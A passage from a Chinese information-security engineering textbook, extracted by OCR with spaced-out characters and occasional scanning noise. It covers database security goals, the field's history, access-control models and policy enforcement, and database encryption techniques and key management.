被 非法 修改 ， 事 物 处 理 及 操作 符合 数据 库 各 种 完整 性 约束 。 如 对 其 中 一 个 字段 的 修改 不 
应 该 破坏 其 他 字段 。 

3. 元 素 安全 性 

确保 数据 库 各 种 存储 元 素 满足 机 密 性 、 完 整 性 、 可 用 性 等 限制 。 元 素 控制 比 文件 控 
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制 复杂 ， 拥 有 更 多 的 粒度 层次 和 更 灵活 的 安全 策略 。 

4. 可 审计 性 

可 以 提供 追踪 存 取 和 修改 数据 库 元 素 的 用 户 的 能 力 。 记 录 数 据 库 中 所 有 事物 和 操 
作 ， 保 留 详细 的 审计 和 日 志 记录 ， 提 供 有 效 地 威慑 和 事后 追查 、 分 析 和 取证 工具 。 审 计 
和 日 志 的 粒度 直接 决定 审计 的 时 间 和 代价 。 

5. 访问 控制 

确保 只 有 授权 用 户 和 程序 可 以 访问 那些 允许 它们 访问 的 数据 元 素 ， 同 时 保证 对 不 同 
的 用 户 限制 使 用 不 同 的 控制 策略 并 允许 灵活 设置 。 

6. 身份 认证 

不 允许 一 个 未 经 授权 的 用 户 对 数据 库 进 行 操作 。 

7. 可 用 性 

数据 库 系统 能 够 随时 对 授权 用 户 提供 高 质量 的 数据 库 服 务 ， 让 用 户 能 够 最 大 限度 地 
访问 允许 他 访问 的 数据 。 

8. 推理 控制 

数据 推理 是 指 用 户 通过 合谋 、 拼 凑 等 方式 ， 从 合法 获得 的 低 安 全 等 级 信息 及 数据 中 
推导 出 受 高 安全 等 级 保护 的 内 容 ， 也 可 以 进一步 估计 数据 推理 的 准确 程度 。 推 理 控制 机 
制 必须 保证 用 户 不 能 从 被 公开 发 布 的 、 授 权 可 被 访问 的 信息 以 及 统计 信息 中 ， 推 导出 秘 
密 的 、 未 被 授权 访问 的 信息 以 及 统计 信息 ， 保 护 所 有 的 秘密 信息 。 

9. 多 级 保护 

多 级 保护 是 信息 系统 等 级 安全 中 重要 的 思想 。 根 据 现实 应 用 的 要 求 ， 可 以 将 数据 划 
分 为 不 同 密级 的 集合 ， 也 可 以 将 同一 记录 中 的 不 同 字段 划分 为 不 同 的 保密 等 级 ， 还 可 以 
将 同一 字段 的 不 同 值 划分 为 不 同 的 安全 等 级 ， 从 而 实现 数据 的 等 级 划分 以 及 用 户 依据 相 
应 等 级 安全 策略 要 求 的 等 级 访问 。 

10. 消除 隐 通 道 

在 多 级 安全 模型 中 ， 隐 通道 是 一 种 违反 系统 安全 策略 ， 表 面 上 合法 的 操作 序列 ， 它 
是 一 种 可 被 攻击 者 利用 于 将 高 等 级 数据 向 低 等 级 用 户 传送 的 通信 信道 。 

消除 隐 通 道 的 目的 是 防止 程序 或 者 用 户 之 间 通 过 非法 授权 进行 信息 传递 ， 需 要 发 现 
各 种 隐 通 道 包括 时 间 隐 通道 、 存 储 隐 通道 等 。 

为 了 解决 以 上 的 安全 目标 ， 数 据 库 安全 在 技术 上 采取 了 一 系列 的 方法 ， 具 体 包括 : 
数据 库 访问 控制 技术 、 数 据 库 加 密 技 术 、 多 级 安全 数据 库 技术 、 数 据 库 的 推理 控制 问题 
和 数据 库 的 备份 与 恢复 等 。 


4.3.2 数据 库 安全 的 发 展 历程 


数据 库 安全 的 发 展 可 分 为 4 个 阶段 : 萌芽 阶段 、 军 事主 导 阶 段 、 标 准 化 阶段 、 多 样 
化 阶段 。 
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20 世纪 60 年 代 末 ， 随 着 计算 机 网 络 的 诞生 ， 人 们 开始 重视 多 用 户 资源 共享 计算 机 
的 安全 问题 。1967 年 , 美国 国防 部 组 建 了 美国 国防 科学 委员 会 管理 的 计算 机 安全 特别 行 
动 小 组 ， 致 力 于 研究 如 何 有 效 保护 多 用 户 资源 共享 计算 机 系统 中 机 密 信息 的 软 、 硬 件 保 
护 技术 并 提供 有 关 建 议 。 这 个 事件 标志 着 萌芽 阶段 的 到 来 。 

在 萌芽 阶段 中 ， 研 究 人 员 主 要 采用 面相 威胁 的 方法 开发 计算 机 安全 系统 ， 用 以 消除 
非 授权 信息 泄露 、 非 授权 信息 修改 和 服务 拒绝 三 类 威胁 。 研 究 工 作 主要 体现 在 访问 控制 
抽象 语义 、 计 算 机 安全 基本 原理 、 安 全 模型 和 安全 操作 系统 的 设计 与 开发 几 个 方面 ， 为 
安全 数据 库 的 研究 和 开发 商定 了 基础 。 

20 世纪 70 年 代 中 期 , 随 着 美国 空军 组 织 的 Multics 操作 系统 上 的 可 信 数 据 库 管 理 系 
统 研究 启动 ， 数 据 库 安全 进入 了 军事 主导 阶段 。 在 此 期 间 IBM 的 PP Griffiths 讨论 了 
System R 授权 模型 ， 给 出 了 分 析 关 系数 据 库 访问 控制 模型 和 机 制 的 理论 基础 。 

进入 20 世纪 80 年 代 中 期 ， 随 着 美军 TCSEC HARP) 的 提出 ， 数 据 库 系统 安全 研 
究 进入 了 标准 化 阶段 。 美 军 还 颁布 了 TDI (Trusted Database Interpretation 可 信 数 据 库 解 
FED 的 文件 ， 说 明 如 何 使 用 TCSEC 对 数据 库 管理 系统 和 其 他 高 级 应 用 进行 评估 。 同 时 ， 
美国 军 方 资助 了 SeaView (Secure Data View) 项 目 ，LDV (Lock Data View) 项 目 等 ， 
这 些 项 目的 目标 均 为 达到 Al 级 的 安全 数据 库 。 同 时 Oracle 的 Trusted Oracle7 达到 了 B1 
级 ，Sybase 的 SQL Server 达到 了 C2 级 ，SQL Secure Server 达到 了 B1 4%, Informix 的 
INFORMIX-Online/Secure5.0 达到 了 B1 级 。 

20 世纪 90 年 代 ， 随 着 计算 机 技术 的 高 速 发 展 ， 社 会 对 计算 机 技术 的 需求 推动 了 整 
个 信息 领域 的 高 速 发 展 。 传 统 的 基于 军事 需求 的 数据 库 安全 研究 已 经 无 法 满足 社会 的 要 
求 。 数 据 库 安 全 面临 着 应 用 环境 和 安全 需求 的 多 样 化 、 数 据 模型 的 多 样 化 、 网 络 及 分 布 
式 计算 发 展 的 多 样 化 以 及 基础 安全 理论 的 发 展 的 挑战 ， 因 此 数据 库 安 全 的 研究 也 随 之 进 
入 多 样 化 发 展 阶段 。 

我 国 的 数据 库 安全 起 步 较 晚 ， 目 前 尚 处 于 国外 标准 化 阶段 ， 其 代表 工作 包括 北京 大 
学 牵头 ， 人 民 大 学 、 中 软 公司 、 华 中 科技 大 学 参与 的 COBASE、 华 中 科技 大 学 达 梦 公司 
的 DM3、 南 京 大 学 和 南大 苏 富 特 软件 股份 有 限 公 司 开 发 的 Softbase、 中 国 科 学 院 信息 
安全 国家 重点 实验 室 研制 的 LOS 安全 数据 库 、 东 软 集团 有 限 公司 开发 的 Openbase 
Secure 等 。 


4.3.3 数据 库 访 问 控制 技术 
在 数据 库 中, 访问 控制 技术 提供 了 一 种 控制 用 户 访问 数据 的 机 制 , 它 通过 创建 用 户 、 
授予 用 户 相 应 权限 来 实施 这 种 控制 ， 规 定 只 有 具有 相应 权限 的 用 户 ， 在 符合 要 求 的 条 件 


下 ， 才 能 对 数据 进行 相应 的 操作 。 这 样 一 种 机 制 在 数据 库 安全 领域 发 挥 巨大 作用 ， 目 前 
几乎 所 有 的 商用 DBMS 都 提供 这 种 机 制 来 防止 非法 用 户 访问 数据 库 。 


lao 


Beh 


信息 安全 工程 师 教程 


43.3.1 数据库 安全 模型 

安全 模型 也 被 称 为 策略 表达 模型 ， 是 一 种 对 安全 需求 与 安全 策略 的 抽象 概念 模型 。 
数据 库 安 全 模型 是 系统 安全 模型 在 数据 库 系统 中 的 一 种 特殊 表达 形式 ， 是 安全 策略 在 数 
据 库 系统 中 的 表达 模型 ， 它 描述 了 数据 库 系 统 中 的 安全 需求 与 安全 策略 。 安 全 策略 是 安 
全 体系 结构 中 的 重要 组 成 部 分 。 安 全 策略 是 一 组 规定 如 何 管 理 、 保 护 和 指派 敏感 信息 的 
法 律 、 法 规 和 实践 经 验 的 集合 。 

安全 策略 表达 模型 一 般 分 为 两 大 类 ， 即 自主 访问 控制 (DAC) 和 强制 访问 控制 
(MAC )。 自主 访问 控制 中 , 用 户 对 信息 的 访问 是 基于 用 户 的 鉴别 和 访问 控制 规则 的 确定 ， 
每 个 用 户 都 要 给 予 系统 中 每 个 访问 对 象 的 访问 权限 。 自 主 访问 控制 模型 的 典型 代表 有 
HRU #2! (Harrison, Ruzzo, Ullman 访问 控制 矩阵 模型 )、Jones 取 予 模型 (Take-Grant 
模型 )、 动作 一 一 实体 模型 等 。 在 强制 访问 控制 中 ， 系统 给 主体 和 客体 分 配 了 不 同 的 安全 
标记 ， 通 过 比较 主体 和 客体 的 安全 标记 是 否 匹 配 ， 来 决定 是 否 允 许 访问 。 强 制 访问 控制 
的 典型 代表 有 BLP 模型 (Bell-La Padula 模型 )、 基 于 角色 的 存 取 控制 模型 、Clark-Wilson 
模型 、BN 模型 (Brewer Nash Chinese Wall 模型 ) 等 。 在 数据 库 安全 领域 还 有 Wood 
模型 、Smith Winslett 模型 等 。 

一 般 而 言 ， 数 据 库 中 需要 满足 的 安全 策略 应 该 满足 以 下 一 些 原则 : 

1. 最 小 特权 原则 

最 小 特权 原则 是 指 将 用 户 对 信息 的 访问 权限 进行 有 效 约束 ， 使 得 该 用 户 仅 被 允许 访 
问 他 应 该 访问 的 信息 范围 内 ， 只 让 访问 用 户 得 到 相当 有 限 的 权利 。 这 些 权利 恰好 能 保证 
该 用 户 完成 自己 的 工作 ， 多 余 的 权利 则 不 分 配 。 这 是 一 种 相当 普遍 的 策略 ， 对 于 数据 库 
主体 尤为 重要 ， 因 为 对 用 户 的 权利 进行 必要 的 限制 ， 可 以 把 信息 泄露 的 可 能 性 降低 到 最 
小 范围 内 。 

2. 最 大 共享 原则 

最 大 共享 原则 是 指 让 用 户 尽 可 能 地 能 够 访问 那些 他 被 允许 访问 的 信息 ， 使 得 不 可 访 
问 的 信息 只 局 限 在 不 允许 访问 这 些 信息 的 用 户 范围 内 ， 从 而 保证 数据 库 中 的 信息 得 到 最 
大 限度 的 利用 。 但 是 ， 这 也 并 不 意味 着 允许 用 户 能 访问 整个 数据 库 资 源 ， 而 是 在 满足 安 
全 要 求 的 前 提 下 实现 最 大 限度 的 共享 。 显然， 这 样 的 访问 策略 对 数据 库 安全 而 言 是 很 重 
要 的 ， 如 果 用 户 要 求 被 苛刻 地 限制 而 得 不 到 所 需要 的 信息 ， 这 就 在 某 种 程度 上 失去 了 建 
立 数据 库 的 意义 。 

3. 开放 系统 原则 和 封闭 系统 原则 

在 一 个 开放 系统 中 ， 策 略 约束 定义 针对 的 是 那些 明确 禁止 的 操作 。 只 要 不 是 策略 明 
确 禁 止 的 操作 ， 一 般 的 存 取 访问 都 是 允许 的 。 在 一 个 封闭 系统 中 ， 则 恰恰 相反 。 策 略 约 
束 定义 针对 的 系统 允许 的 操作 。 只 有 明确 许可 的 访问 才 允 许 进 行 。 

在 开放 系统 中 ， 存 取 规 则 规定 的 是 哪些 访问 操作 是 不 被 允许 的 ， 如 果 某 一 条 访问 规 
则 丢失 ， 就 会 导致 未 经 许可 的 访问 发 生 。 在 封闭 系统 中 ， 访 问 规则 规定 的 仅仅 是 哪些 访 
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问 是 被 许可 的 。 如 果 某 条 访问 规则 丢失 ， 只 会 使 得 访问 限制 更 加 严格 。 但 车 对 于 开放 系 
统 和 封闭 系统 而 言 ， 若 访问 规则 存在 缺陷 ， 则 都 可 能 导致 未 经 许可 的 访问 发 生 。 相 比 而 
言 ， 从 安全 角度 来 看 ， 封 闭 系统 相对 比较 可 靠 的 ， 但 是 一 个 封闭 的 系统 固然 保密 ， 可 如 
果实 现 共享 则 会 遇 到 很 多 困难 。 

在 设计 访问 控制 策略 时 ， 还 有 一 些 特殊 的 规则 约束 ， 如 基于 数据 库 内 容 的 约束 ; 基 
于 某 些 关 键 的 属性 名 的 约束 ; 基于 上 下 文 的 约束 ; 基于 历史 信息 的 约束 。 对 于 基于 数据 
库 内 容 的 访问 控制 ， 它 的 访问 控制 策略 是 依据 数据 库 中 数据 字段 内 容 来 进行 判别 允许 访 
问 与 否 的 策略 ， 即 用 户 对 于 数据 库 的 访问 能 力 根据 由 数据 记录 的 某 个 属性 值 来 确定 的 。 
对 于 基于 关键 属性 名 称 的 访问 控制 ， 是 考虑 允许 一 个 用 户 进行 访问 与 否 的 成 功 关键 不 是 
取决 于 数据 库 中 的 属性 值 ， 而 是 属性 名 。 对 于 基于 上 下 文 指定 的 访问 控制 ， 它 的 访问 控 
制 判别 关键 是 与 各 属性 之 间 的 关系 有 关 ， 这 种 控制 主要 限制 用 户 同 时 对 多 个 属性 进行 访 
问 。 对 于 基于 历史 相关 的 访问 控制 ， 它 是 针对 有 些 数据 就 其 本 身 来 讲 并 不 会 泄露 什么 秘 
密 ， 但 是 和 用 户 以 前 已 经 得 到 的 数据 联系 起 来 ， 就 可 能 让 用 户 从 中 推断 出 秘密 信息 的 内 
容 的 情况 来 考虑 的 。 
43.3.2 ”数据 库 安全 策略 的 实施 

实现 数据 库 安全 性 的 关键 在 于 访问 控制 ， 在 制定 了 访问 控制 策略 的 基础 上 ， 要 在 数 
据 库 系统 中 实施 这 些 访问 控制 策略 通常 包括 以 下 这 些 方法 。 

1. 子 模式 法 

在 数据 库 中 ， 数 据 库 的 模式 描述 了 库 中 数据 自身 以 及 数据 之 间 一 系列 相对 稳定 的 特 
征 信息 。 在 数据 库 中 ， 数 据 内 容 是 可 以 动态 变化 的 ， 但 数据 库 的 模式 在 较 长 一 段 时 间 里 
是 保持 不 变 的 。 对 于 用 户 而 言 ， 他 所 能 访问 到 的 信息 是 数据 库 中 模式 的 一 部 分 ， 并 且 是 
模式 的 一 种 对 外 体现 形式 ， 而 不 能 访问 到 或 了 解 到 整个 模式 。 用 户 所 能 了 解 的 那 部 分 模 
式 ， 称 为 子 模式 。 

利用 子 模式 ， 数 据 库 系统 就 可 以 提供 某 些 类 型 的 访问 控制 。 当 用 户 不 被 授权 访问 某 
些 属 性 信息 时 ， 系 统 就 将 该 属性 的 信息 从 用 户 可 访问 的 子 模式 中 剔除 出 来 ， 让 余下 的 属 
性 构成 的 子 模式 提供 给 用 户 。 根 据 不 同 的 访问 控制 要 求 ， 可 以 给 不 同 的 用 户 提供 不 同 的 
子 模式 ， 从 而 实现 了 数据 库 中 数据 的 安全 性 。 

2. SQL 修改 查询 法 

该 方法 的 核心 思想 是 当 用 户 进行 SQL 查询 时 ， 数 据 库 系 统 对 用 户 提交 的 SQL 查询 
语句 自动 附加 上 更 多 的 安全 约束 限制 。 例如 用 户 提 交 SQL 语句 的 查询 条 件 为 “满足 条 件 
A 的 数据 记录 ”， 而 数据 库 系 统 中 安全 策略 规定 “不 满足 条 件 B 的 记录 是 不 能 访问 ”。 当 
用 户 提交 这 个 查询 时 候 ， 数 据 库 管理 系统 会 对 用 户 的 该 用 户 的 查询 进行 自动 化 的 修改 ， 
用 户 的 查询 条 件 实际 上 变 成 了 “ 既 要 满足 条 件 A 又 要 满足 条 件 B 的 数据 记录 ”。 

3. 集合 法 

有 了 时， 是否 允许 对 信息 进行 访问 不 仅仅 取决 于 当前 的 查询 ， 还 取决 于 以 前 曾 提 过 的 
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查询 及 系统 作出 的 回答 ， 这 便 是 前 面 所 述 的 基于 上 下 文 的 访问 控制 及 基于 历史 的 访问 控 
制 策 略 ， 显 然 ， 子 模 法 及 修改 询问 法 对 这 样 的 策略 不 适用 。 为 解决 这 一 问题 ， 可 以 定义 
一 个 集合 ， 集 合 中 每 个 元 素 表示 访问 对 象 及 进行 的 操作 ， 简 称 为 对 象 访问 。 同 一 集合 中 
的 元 素 均 为 互 斥 的 ， 即 如 果 某 个 元 素 表示 的 对 象 访问 发 生 过 ， 则 其 他 对 象 访问 不 允许 再 
发 生 

4. 请 求 排序 法 

当 访问 对 象 很 多 、 存 取 规 则 也 很 多 时 ， 采 用 集合 法 处 理 很 复杂 ， 为 此 ， 可 根据 存 取 
规则 来 确定 请 求 顺序 , 对 各 请 求 进行 拓扑 排序 ， 从 而 理 顺 各 SQL 请 求 与 安全 规则 之 间 的 
关系 ， 获 得 一 个 准确 的 查询 约束 。 


4.3.4 数据 库 加 密 


4.3.4.1 ”数据 库 加 密 概念 

针对 数据 库 系统 的 加 密 技术 是 保证 数据 安全 性 ， 强 化 安全 存 取 管理 的 重要 手段 。 通 
常 而 言 ， 大 型 数据 库 管理 系统 的 运行 平台 一 般 是 MS-Windows 和 Unix， 这 些 操作 系统 
的 安全 级 别 相 对 较 低 ， 安 全 功能 有 限 。 尽 管 数据 库 管理 系统 在 操作 系统 提供 的 安全 功能 
基础 上 增加 了 不 少 安全 措施 ， 但 由 于 操作 系统 和 数据 库 管理 系统 对 数据 库 文件 本 身 仍然 
缺乏 有 效 的 保护 措施 ， 这 就 为 攻击 者 提供 了 可 乘 之 机 。 

数据 库 加 密 技术 是 一 种 对 计算 机 系统 外 存储 器 中 数据 进行 保护 的 有 效 手 段 。 通 过 数 
据 加 密 ， 可 以 对 数据 库 的 关键 数据 进行 保护 ， 保 证 关键 数据 即使 被 泄露 或 者 丢失 ， 也 难 
以 被 人 破译 ， 因 此 可 以 大 大 提高 关键 数据 的 安全 性 。 

同时 ， 可 以 依据 数据 库 的 使 用 者 的 使 用 权限 、 数 据 库 中 数据 的 物理 存储 与 逻辑 关系 
对 数据 库 的 密 钥 机 制 进行 分 配 管理 ， 从 而 使 得 对 于 数据 库 内 容 不 需要 了 解 的 数据 库 管理 
员 不 能 获取 数据 的 明文 信息 。 这 样 也 防范 了 攻击 者 滥用 数据 库 管 理 员 权限 ， 窃 取 用 户 数 
据 的 可 能 ， 从 而 提高 用 户 数据 的 安全 性 。 

43.4.2 ”数据 库 加 密 技术 的 基本 要 求 

数据 加 密 是 防止 数据 库 中 数据 泄露 的 有 效 手段 ， 与 传统 的 加 密 技术 相 比 ， 数 据 库 加 
密 技 术 具 有 其 更 为 特殊 的 要 求 。 

(1) 数据 库 中 的 数据 保存 的 时 间 相 对 更 长 ， 因 此 对 加 密 强 度 的 要 求 也 更 高 ; 

(2) 数据 库 中 数据 量 很 大 , 对 数据 的 加 解密 时 间 相 对 较 长 , 因此 加 密 速度 要 求 更 高 ; 
为 了 避免 反复 的 加 解密 ， 更 新 密 钥 的 频 度 也 不 易 过 高 ; 为 了 避免 破译 风险 ， 不 可 以 对 海 
量 数据 使 用 同一 密 钥 加 密 ， 需 要 进行 合理 分 配 ; 

(3) 数据 库 中 数据 通常 是 多 用 户 共享 的 ， 对 加 密 和 解密 的 性 能 要 求 也 会 更 高 ， 以 不 
会 明显 降低 系统 性 能 为 要 求 ; 

(4) 数据 库 中 的 数据 规律 性 较 强 ， 某 一 个 列 的 数据 项 往往 取 值 于 某 一 个 限定 范围 ， 
往往 呈现 一 定 的 概率 分 布 。 因 此 数据 库 的 加 密 技 术 需 要 消除 密 文 之 间 的 关联 性 ， 确 保 相 
同 或 类 似 的 明文 在 加 密 后 的 密 文 无 规律 性 。 
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4.3.4.3 ”数据 库 加 密 技 术 相关 问题 

一 般 而 言 ， 对 于 关系 数据 库 系统 的 数据 库 加 密 技术 关注 以 下 这 些 问 题 。 

1. 适应 数据 查询 的 加 密 机 制 

传统 的 加 密 技 术 是 以 数据 块 为 单位 ， 加 密 的 对 象 是 一 个 文件 或 者 通信 数据 包 ， 加 解 
密 都 是 从 头 至 尾 顺 序 进行 ， 而 数据 库 数据 的 使 用 方法 决定 了 它 不 可 能 以 整个 数据 库 文 件 
为 单位 进行 加 密 。 当 符合 检索 条 件 的 记录 被 检索 出 来 后 ， 就 必须 对 该 记录 迅速 解密 。 如 
果 数 据 库 采 用 的 加 密 技术 其 加 密 对 象 是 数据 库 文件 的 话 ， 当 和 欲 检索 的 记录 是 数据 库 文 件 
中 随机 的 一 段 ， 那 么 就 无 法 从 中 间 开 始 解密 ， 除 非 对 数据 库 文 件 进行 从 头 到 尾 的 一 次 解 
密 ， 然 后 再 去 查找 相应 的 这 个 记录 ， 显 然 这 样 的 处 理 方式 效率 非常 低下 。 必 须 解 决 随机 
地 从 数据 库 文 件 中 某 一 段 数据 开始 解密 的 问题 。 同 时 ， 加 密 系统 影响 数据 操作 响应 时 间 
应 尽量 短 。 此 外 ， 对 数据 库 的 合法 用 户 来 说 ， 数 据 的 录入 、 修 改 和 检索 操作 应 该 是 透明 
的 ， 不 需要 考虑 数据 的 加 /解密 问题 。 

对 于 传统 的 密码 系统 中 ， 密 钥 是 秘密 的 ， 知 道 的 人 越 少 越 好 。 一 旦 获取 了 密 钥 和 密 
码 体制 就 能 攻破 密码 ， 解 开 密 文 。 而 数据 库 数据 是 共享 的 ， 有 权限 的 用 户 随 时 需要 知道 
密 钥 来 查询 数据 。 因 此 ， 数 据 库 密码 系统 宜 采 用 公开 密 钥 的 加 密 方法 。 

2. 多 级 密 钥 管 理 机 制 

加 密 数 据 库 中 的 密 钥 管理 比 其 他 系统 的 密 钥 管理 更 为 困难 与 复杂 。 如 在 加 密 数据 库 
中 往往 存储 了 海量 的 数据 ， 因 此 当 更 换 密 钥 时 ， 需 要 将 原 有 加 密 数据 进行 解密 处 理 ， 这 
样 就 会 造成 较 大 的 计算 代价 ， 因 此 密 钥 的 更 新 不 宜 过 于 频繁 。 

数据 库 客体 之 间 隐 含 着 复杂 的 逻辑 关系 ， 一 个 逻辑 结构 可 能 对 应 着 多 个 数据 库 物 理 
客体 ， 所 以 数据 库 加 密 不 仅 密 钥 量 大 ， 而 且 组 织 和 存储 工作 比较 复杂 ， 需 要 对 密 钥 实 现 
动态 管理 。 为 了 解决 这 一 问题 ， 往 往 采取 了 分 级 密 钥 管理 结构 。 

如 对 于 关系 数据 库 中 ， 查 询 路 径 依次 是 数据 库 名 、 表 名 、 记 录 名 和 字段 名 。 数 据 库 
关系 运算 中 参与 运算 的 最 小 单位 是 字段 ， 因 此 ， 字 段 是 最 小 的 加 密 单位 。 也 就 是 说 当 碍 
得 一 个 数据 后 ， 该 数据 所 在 的 库 名 、 表 名 、 记 录 名 、 字 段 名 都 应 是 知道 的 。 一 般 而 言 ， 
对 应 的 库 名 、 表 名 、 记 录 名 、 字 段 名 都 具有 自己 的 子 密 铀 ， 这 些 子 密 钥 组 成 了 一 组 能 
随时 加 /解密 的 公开 密 钥 。 

从 结构 上 而 言 ， 可 以 将 具体 的 实现 技术 归纳 为 二 级 、 三 级 密 钥 以 及 更 多 层级 的 管理 
机 制 。 对 于 二 级 密 钥 结构 ， 其 第 一 级 密 钥 为 主 密 钥 ， 第 二 级 密 钥 为 工作 密 钥 ， 主 密 钥 对 
二 级 密 钥 进 行 保护 ， 二 级 密 钥 对 数据 库 中 的 数据 提供 保护 。 对 于 三 级 密 钥 结构 ， 第 一 级 
密 钥 为 主 密 钥 , 第 二 级 密 钥 为 各 个 数据 表 的 表 密 钥 , 第 三 级 密 钥 为 各 个 数据 项 的 项 密 钥 。 

从 实现 技术 上 ， 主 密 钥 是 以 明文 形式 存在 的 ， 因 此 它 的 存储 访问 需要 受到 数据 库 系 
统 的 访问 控制 策略 保护 ， 往 往 存储 于 数据 库 中 的 安全 区 域内 ， 如 将 密 钥 存 储 于 硬件 加 密 
部 件 中 ， 并 且 对 下 级 密 钥 的 解密 过 程 在 硬件 部 件 中 执行 。 

3. 部 分 加 密 技术 

数据 加 密 通 过 对 明文 进行 复杂 的 加 密 操作 ， 以 达到 无 法 发 现 明 文 和 密 文 之 间 、 密 文 
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和 密 钥 之 间 的 内 在 关系 ,经 过 加 密 的 数据 需要 经 得 起 来 自 操作 系统 和 DBMS 的 攻击 。 另 
一 方面 , DBMS 要 完成 对 数据 库 文件 的 管理 和 使 用 , 必须 具有 能 够 识别 部 分 数据 的 条 件 。 
因此 ， 只 能 对 数据 库 中 数据 进行 部 分 加 密 。 

同时 ， 需 要 对 加 密 数 据 进 行 合 理 的 处 理 ， 这 样 才能 有 效 地 进行 加 密 后 数据 的 管理 。 
在 进行 数据 加 密 时 ， 加 密 后 的 数据 往往 是 以 二 进 制 的 形式 输出 的 ， 这 就 会 造成 输出 的 数 
据 类 型 与 被 加 密 的 原始 数据 的 基本 类 型 不 一 致 ， 这 样 当 进 行 数据 管理 时 ，DBMS 将 会 因 
加 密 后 的 数据 不 符合 定义 的 数据 类 型 而 拒绝 加 载 ， 因 此 合理 的 数据 类 型 处 理 是 加 密 中 需 
要 考虑 的 首要 问题 。 其 次 ， 需 要 处 理 数据 的 存储 问题 ， 实 现 数据 库 加 密 后 ， 应 基本 上 不 
增加 空间 开销 。 在 目前 条 件 下 ， 数 据 库 关 系 运算 中 的 匹配 字段 ， 如 外 码 、 索 引 字 段 等 数 
据 不 宜 加 密 。 

4. 层次 加 密 技 术 

可 以 在 3 个 不 同 层次 实现 对 数据 库 数据 的 加 密 ， 这 3 个 层次 分 别 是 OS. DBMS 内 
核 层 和 DBMS 外 层 。 

在 OS 层 对 数据 库 文件 进行 加 密 , 由 于 操作 系统 无 法 了 解数 据 库 文件 中 的 数据 关系 ， 
因此 操作 系统 不 可 能 为 数据 库 系统 产生 与 数据 相关 的 、 合 理 的 密 钥 ， 也 无 法 进行 合理 的 
密 钥 管理 和 使 用 。 对 于 大 型 数据 库 来 说 ， 由 于 其 数据 管理 相对 复杂 ， 因 此 在 OS 层 进 行 
加 密 目 前 还 难以 实现 。 

在 DBMS 内 核 层 实现 加 密 ， 这 种 方法 也 被 称 作 库 内 加 密 , 它 是 指数 据 在 物理 存 取 之 
前 完成 加 /解密 工作 ， 如 图 4-5 所 示 。 在 这 种 方式 下 ， 加 、 解 密 过 程 对 用 户 与 应 用 而 言 是 
透明 的 ， 数 据 库 应 用 系统 并 不 感知 加 /解密 部 件 的 存在 ， 加 /解密 的 操作 由 DBMS 和 加 解 
密 部 件 在 一 定 配 置 策略 下 独立 协同 完成 。 在 这 种 加 密 方式 下 ， 密 钥 往往 存储 于 DBMS 可 
以 访问 到 的 地 方 ， 以 数据 字典 的 形式 存在 。 但 这 种 方式 涉及 DBMS 和 加 密 部 件 之 问 的 接 
口 问题 ， 这 就 需要 DBMS 开发 商 的 支持 。 


数据 库 应 用 系统 


数据 库 管理 系统 
密码 部 件 


图 4-5 DBMS 内 核 层 加 密 
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这 种 加 密 方 式 的 优点 是 加 密 功 能 强 ， 并 且 加 密 功 能 几乎 不 会 影响 或 者 很 少 影响 
DBMS 的 功能 。 对 于 数据 库 应 用 系统 而 言 DBMS 内 核 层 加 密 方式 的 透明 性 ， 使 得 应 用 
程序 无 须 做 任何 改动 就 可 以 直接 获取 较 好 的 安全 性 。 

但 这 种 加 密 体系 存在 一 些 缺 点 。 首 先 密 钥 管理 安全 问题 ， 由 于 密 钥 以 数据 字典 形式 
存储 于 数据 库 中 ， 而 密 钥 管理 体系 中 的 根 密 钥 必须 是 以 明文 形式 存在 的 ， 因 此 密 钥 的 安 
全 必须 依赖 于 DBMS 的 访问 控制 机 制 。 作 为 这 种 安全 隐患 的 弥补 方式 ,往往 采用 硬件 加 
密 部 件 来 保护 根 密 钥 。 其 二 ， 在 性 能 方面 ， 由 于 加 密 部 件 与 DBMS 都 处 于 服务 器 端 ， 因 
此 加 /解密 工作 在 服务 器 端 进行 ， 这 势必 加 重 了 数据 库 服务 器 的 负载 。 其 三 ， 加 密 算 法 的 
灵活 性 方面 ，DBMS 中 一 般 只 提供 有 限 的 加 密 算法 与 强度 供 数据 库 应 用 系统 使 用 ， 这 就 
降低 了 用 户 的 自主 性 。 

相 比 而 言 ， 在 DBMS 外 层 实 施加 密 ， 即 库 外 加 密 ， 是 一 种 较为 实用 的 方法 ， 如 图 
4-6 所 示 。 其 具体 思路 是 ， 将 数据 库 加 密 系统 做 成 DBMS 的 一 个 外 层 工 具 ， 加 /解密 操作 
TE DBMS 之 外 执行 , DBMS 所 管理 的 是 密 文 数据 。 数据库 应 用 系统 在 采用 这 种 加 密 方式 
时 ， 加 /解密 运算 可 以 放 在 客户 端 进行 。 

其 显著 优点 是 加 解密 过 程 在 专门 的 服务 器 或 者 客户 端 执行 , 减少 了 DBMS 的 设计 复 
杂 度 ， 也 不 会 加 重 数据 库 服 务 器 的 负载 并 可 以 降低 对 密码 算法 性 能 的 严格 要 求 ， 并 且 可 
实现 网 上 传输 加 密 。 同 时 ， 由 于 密 钥 与 数据 可 以 分 开 存储 ， 因 此 相 比 于 DBMS 内 核 层 加 
密 而 言 ， 加 /解密 的 流程 会 更 加 清晰 。 但 缺点 是 由 于 加 密使 得 数据 之 间 的 某 些 关系 可 能 无 
法 充分 在 数据 库 中 体现 出 来 , 某 些 功能 受到 限制 , 如 加 密 后 的 数据 无 法 进行 正常 的 索引 。 
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图 4-6 DBMS 外 层 加 密 


5. WERE 
为 了 避免 相同 明文 使 用 同一 密 钥 造成 的 密 文 相同 问题 ， 需 要 根据 加 密 粒 度 的 不 同 ， 
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对 不 同 的 数据 使 用 不 同 的 密 钥 。 总 体 而 言 ， 加 密 粒 度 越 小 则 灵活 性 越 高 且 安全 性 越 好 ， 
但 实现 上 则 越 为 复杂 。 

以 数据 表 为 单位 的 加 密 技 术 与 操作 体 统 中 的 文件 加 密 技 术 类 似 ， 密 码 部 件 依据 表 密 
钥 对 相应 的 数据 表 进 行 密码 学 处 理 ， 形 成 密 文 存储 。 数 据 表 加 密 的 加 密 单位 一 般 是 文件 
或 文件 块 。 该 方式 的 优点 在 于 实现 简单 ， 但 对 表 中 任意 数据 的 访问 ， 需 要 对 整个 数据 表 
进行 解密 ， 必 然 会 形成 密 钥 的 反复 使 用 ， 降 低 加 密 系统 的 可 靠 性 或 者 因 加 解密 时 间 过 长 
而 无 法 使 用 。 

在 目前 条 件 下 , 对 于 关系 数据 库 而 言 ,加 /解密 的 粒度 也 可 以 是 每 个 记录 的 字段 数据 。 
